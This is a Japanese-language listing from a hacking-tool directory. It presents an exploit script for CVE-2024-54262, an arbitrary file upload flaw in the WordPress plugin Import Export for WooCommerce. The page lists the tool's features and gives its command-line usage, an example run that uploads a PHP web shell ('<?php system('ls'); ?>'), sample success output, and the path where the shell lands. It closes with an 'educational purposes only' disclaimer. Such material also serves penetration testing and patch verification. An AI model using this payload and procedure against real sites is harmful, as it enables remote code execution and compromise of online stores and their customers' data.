Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-54262 — CVE-2024-54262 のエクスプロイト: Import Export for WooCommerce における任意ファイルアップロード | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-54262
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubnxploited/cve-2024-54262

CVE-2024-54262

CVE-2024-54262 のエクスプロイト: Import Export for WooCommerce における任意ファイルアップロード

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-54262

CVE-2024-54262 のエクスプロイト: Import Export for WooCommerce の任意ファイルアップロード

概要

このスクリプトは、WordPress プラグイン「Import Export for WooCommerce」の脆弱性を悪用します。この脆弱性により、認証されていないユーザーが任意のファイルをアップロードでき、潜在的なリモートコード実行(RCE)につながる可能性があります。

機能:

  • バージョン検出: WordPress サイトが脆弱性のあるプラグインバージョンを実行しているかを自動的にチェックします。
  • 認証: さらなる悪用のために WordPress ログインをサポートします。
  • ファイルアップロード: RCE のための悪意のある PHP ファイルのアップロードを可能にします。

前提条件:

  1. Python 3.x
  2. 必要な Python ライブラリ:
    • requests
    • argparse

依存関係をインストールするには:

root@kitploit:~
pip install requests
  1. 対象の WordPress サイトが脆弱性のあるバージョンのプラグインを使用していることを確認してください。

使用方法:

root@kitploit:~
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of the WordPress site
  --username USERNAME, -un USERNAME
                        Username for login
  --password PASSWORD, -p PASSWORD
                        Password for login
  --command COMMAND, -c COMMAND
                        PHP shell code to upload

例:

root@kitploit:~
 CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"

出力の説明

  1. サイトは脆弱です。
    • WordPress サイトが脆弱性のあるプラグインバージョンを実行していることを示します。
  2. ログインに成功しました。
    • 提供された認証情報でログインが成功したことを確認します。
  3. root@kitploit:~
    {
        "status": true,
        "code": 104,
        "message": "Success",
        "data": {
            "file_name": "import_manual_1737090262.php",
            "total_requests": 1,
            "import_columns": "all",
            "product_search_type": "SKU",
            "product_operation": "create_new_update_existing",
            "field_separator": ","
        }
    }
    
    
    
  • シェル名: import_manual_1737090262.php
  • シェルパス: wp-content/uploads/import-export-for-woocommerce/product/

免責事項

このツールは教育目的のみで提供されています。作者は、このスクリプトの誤用または損害について一切の責任を負いません。明示的な許可なくシステムへの不正アクセスまたは悪用を行うことは、違法かつ非倫理的です。

ツールをダウンロード